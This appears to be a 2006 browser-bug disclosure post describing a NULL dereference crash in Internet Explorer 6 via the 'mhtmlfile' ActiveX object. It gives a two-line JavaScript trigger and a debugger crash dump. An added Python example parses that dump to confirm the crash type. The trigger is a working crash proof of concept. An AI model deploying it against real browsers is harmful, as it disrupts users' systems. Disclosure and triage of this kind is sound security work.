The following bug was tested on the latest version of Internet Explorer 6 on a fully-patched Windows XP SP2 system. Setting the location or URL property of an 'mhtmlfile' ActiveX object triggers a NULL dereference. Thanks to 'sniper' for the submission.
var a = new ActiveXObject('mhtmlfile');
a.location = "http://browserfun.blogspot.com";
Demonstration
eax=00000000 ebx=00000001 ecx=0000ae80
edx=0020540c esi=019c2420 edi=00000000
eip=7dcd113e esp=00139048 ebp=0013b074
mshtml!COmWindowProxy::CanNavigateToUrlWithZoneCheck+0x9b:
7dcd113e 80783e00 cmp byte ptr [eax+0x3e],0x0 ds:0023:0000003e=??
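Reading the crash output above, as an added example that is not part of the original post: the Python code below parses the quoted dump, recomputes the address of the faulting read from eax and the 0x3e displacement, and checks that it falls in the unmapped NULL region. The triage helper, its regular expressions and the 64 KiB threshold are assumptions of this example.

```python
import re

# Crash output exactly as quoted in the post (register dump + faulting instruction).
CRASH = """\
eax=00000000 ebx=00000001 ecx=0000ae80
edx=0020540c esi=019c2420 edi=00000000
eip=7dcd113e esp=00139048 ebp=0013b074
mshtml!COmWindowProxy::CanNavigateToUrlWithZoneCheck+0x9b:
7dcd113e 80783e00 cmp byte ptr [eax+0x3e],0x0 ds:0023:0000003e=??
"""

# Assumption of this example: anything below 64 KiB is treated as the NULL page
# region, which 32-bit Windows keeps unmapped for user-mode code.
NULL_REGION = 0x10000

REG_RE = re.compile(r"\b(e[a-z]{2})=([0-9a-f]{8})\b", re.I)
SYM_RE = re.compile(r"^(\w+!\S+?)(?:\+0x[0-9a-f]+)?:\s*$", re.I | re.M)
MEM_RE = re.compile(r"\[(e[a-z]{2})(?:([+-])(?:0x)?([0-9a-f]+)h?)?\]", re.I)
SEG_RE = re.compile(r"\b[c-gs]s:[0-9a-f]{4}:([0-9a-f]{8})=(\S+)", re.I)


def triage(text):
    """Classify a 32-bit WinDbg-style crash snippet (hypothetical helper)."""
    regs = {name.lower(): int(value, 16) for name, value in REG_RE.findall(text)}
    sym, mem, seg = SYM_RE.search(text), MEM_RE.search(text), SEG_RE.search(text)
    if not (mem and seg):
        raise ValueError("faulting instruction has no memory operand")
    base = mem.group(1).lower()
    disp = int(mem.group(3), 16) if mem.group(3) else 0
    if mem.group(2) == "-":
        disp = -disp
    # Recompute base + displacement and compare with the debugger's annotation.
    ea = (regs[base] + disp) & 0xFFFFFFFF
    unreadable = "?" in seg.group(2)      # "??" means the address is not mapped
    return {
        "symbol": sym.group(1) if sym else None,
        "base_register": base,
        "effective_address": ea,
        "matches_debugger": ea == int(seg.group(1), 16),
        "null_dereference": regs[base] == 0 and ea < NULL_REGION and unreadable,
    }


if __name__ == "__main__":
    for key, value in triage(CRASH).items():
        print(f"{key}: {value}")
```

A zero base register with a small fixed displacement and an unreadable target is the pattern of a field read through a NULL object pointer, which is what separates this crash from a read through a wild or attacker-influenced pointer.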
This bug will be added to the OSVDB:
Microsoft IE MHTMLFile Multiple Property NULL Dereference
Sunday, July 16, 2006